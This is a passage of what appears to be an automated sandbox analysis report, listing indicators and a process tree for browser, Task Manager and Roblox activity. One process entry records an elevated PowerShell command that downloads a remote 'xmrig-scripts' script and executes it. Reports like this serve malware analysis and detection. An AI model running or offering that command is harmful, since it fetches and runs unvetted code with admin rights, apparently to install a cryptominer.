taskmgr.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe 580 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2372 RobloxStudioBeta.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 4232 MicrosoftEdgeCP.exe 4232 MicrosoftEdgeCP.exe 4232 MicrosoftEdgeCP.exe 4232 MicrosoftEdgeCP.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 4880 chrome.exe 2764 msedgewebview2.exe 2764 msedgewebview2.exe 2764 msedgewebview2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 652 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 652 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 652 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 652 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 432 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 432 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 432 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3472 MicrosoftEdge.exe Token: SeDebugPrivilege 3472 MicrosoftEdge.exe Token: SeDebugPrivilege 2680 taskmgr.exe Token: SeSystemProfilePrivilege 2680 taskmgr.exe Token: SeCreateGlobalPrivilege 2680 taskmgr.exe Token: 33 2680 taskmgr.exe Token: SeIncBasePriorityPrivilege 2680 taskmgr.exe Token: SeDebugPrivilege 4916 firefox.exe Token: SeDebugPrivilege 4916 firefox.exe Token: SeShutdownPrivilege 1452 chrome.exe Token: SeCreatePagefilePrivilege 1452 chrome.exe Token: SeShutdownPrivilege 1452 chrome.exe Token: SeCreatePagefilePrivilege 1452 chrome.exe Token: SeShutdownPrivilege 1452 chrome.exe Token: SeCreatePagefilePrivilege 1452 chrome.exe Token: SeShutdownPrivilege 1452 chrome.exe Token: SeCreatePagefilePrivilege 1452 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe Token: SeShutdownPrivilege 4880 chrome.exe Token: SeCreatePagefilePrivilege 4880 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 4916 firefox.exe 4916 firefox.exe 4916 firefox.exe 4916 firefox.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 2680 taskmgr.exe 4916 firefox.exe 4916 firefox.exe 4916 firefox.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe 1452 chrome.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 3472 MicrosoftEdge.exe 4232 MicrosoftEdgeCP.exe 652 MicrosoftEdgeCP.exe 4232 MicrosoftEdgeCP.exe 4916 firefox.exe 2372 RobloxStudioBeta.exe -
Suspicious use of UnmapMainImage 4 IoCs
pid Process 596 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4232 wrote to memory of 432 4232 MicrosoftEdgeCP.exe 78 PID 4232 wrote to memory of 432 4232 MicrosoftEdgeCP.exe 78 PID 4232 wrote to memory of 432 4232 MicrosoftEdgeCP.exe 78 PID 4232 wrote to memory of 432 4232 MicrosoftEdgeCP.exe 78 PID 4232 wrote to memory of 432 4232 MicrosoftEdgeCP.exe 78 PID 4232 wrote to memory of 432 4232 MicrosoftEdgeCP.exe 78 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 3348 wrote to memory of 4916 3348 firefox.exe 82 PID 4916 wrote to memory of 4812 4916 firefox.exe 83 PID 4916 wrote to memory of 4812 4916 firefox.exe 83 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 PID 4916 wrote to memory of 4952 4916 firefox.exe 84 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection msedgewebview2.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\LaunchWinApp.exe"C:\Windows\system32\LaunchWinApp.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"1⤵
- Access Token Manipulation: Create Process with Token
PID:1640
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3472
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:1428
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:652
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
PID:432
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2680
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.0.253263564\1666715509" -parentBuildID 20221007134813 -prefsHandle 1736 -prefMapHandle 1716 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0b1bc83-3f1d-4686-8068-cb4024606cd8} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 1824 20cfe9ce158 gpu3⤵PID:4812
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.1.2105767407\1393510733" -parentBuildID 20221007134813 -prefsHandle 2168 -prefMapHandle 2156 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eff2cd15-9b23-46a3-9cff-769ca4695bf4} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 2180 20cfe8fb358 socket3⤵
- Checks processor information in registry
PID:4952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.2.1072239049\118926637" -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d4b5d16-f731-455b-b64c-a9aeda37f31c} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3136 20c87311558 tab3⤵PID:1484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.3.1333361495\869113507" -childID 2 -isForBrowser -prefsHandle 3396 -prefMapHandle 3376 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07302cb8-e27d-49af-a573-06849357c768} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3408 20c877dab58 tab3⤵PID:2252
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.4.1818201270\1027860085" -childID 3 -isForBrowser -prefsHandle 4336 -prefMapHandle 4324 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5539895-a374-4540-97db-07a54d9f5c89} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 3456 20c88383c58 tab3⤵PID:3452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.5.1089039125\1913300989" -childID 4 -isForBrowser -prefsHandle 2624 -prefMapHandle 4832 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48f6a0e0-2593-43ae-827b-b70ebd43c0eb} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 4812 20c895e6558 tab3⤵PID:208
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.6.901914592\1157740721" -childID 5 -isForBrowser -prefsHandle 5056 -prefMapHandle 5060 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a951b25-98a4-4879-94eb-9ff815ffedd9} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5048 20c8a226858 tab3⤵PID:4944
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4916.7.508253332\1059688177" -childID 6 -isForBrowser -prefsHandle 5240 -prefMapHandle 5244 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1284 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1b9deee-dadd-4bdc-9f4b-e0dee4e52a84} 4916 "\\.\pipe\gecko-crash-server-pipe.4916" 5236 20c8a225058 tab3⤵PID:2972
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1452 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffde1649758,0x7ffde1649768,0x7ffde16497782⤵PID:1700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:22⤵PID:4104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:1432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:2404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:12⤵PID:4208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:12⤵PID:4520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4528 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:12⤵PID:2080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4772 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:1120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:1200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:3452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1792,i,17076448140363813825,9771599590131506849,131072 /prefetch:82⤵PID:1444
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1560
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:4880 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffde1649758,0x7ffde1649768,0x7ffde16497782⤵PID:4624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:22⤵PID:3064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:3252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2872 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:2356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4488 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:2604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4496 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4764 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:4796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3440
-
-
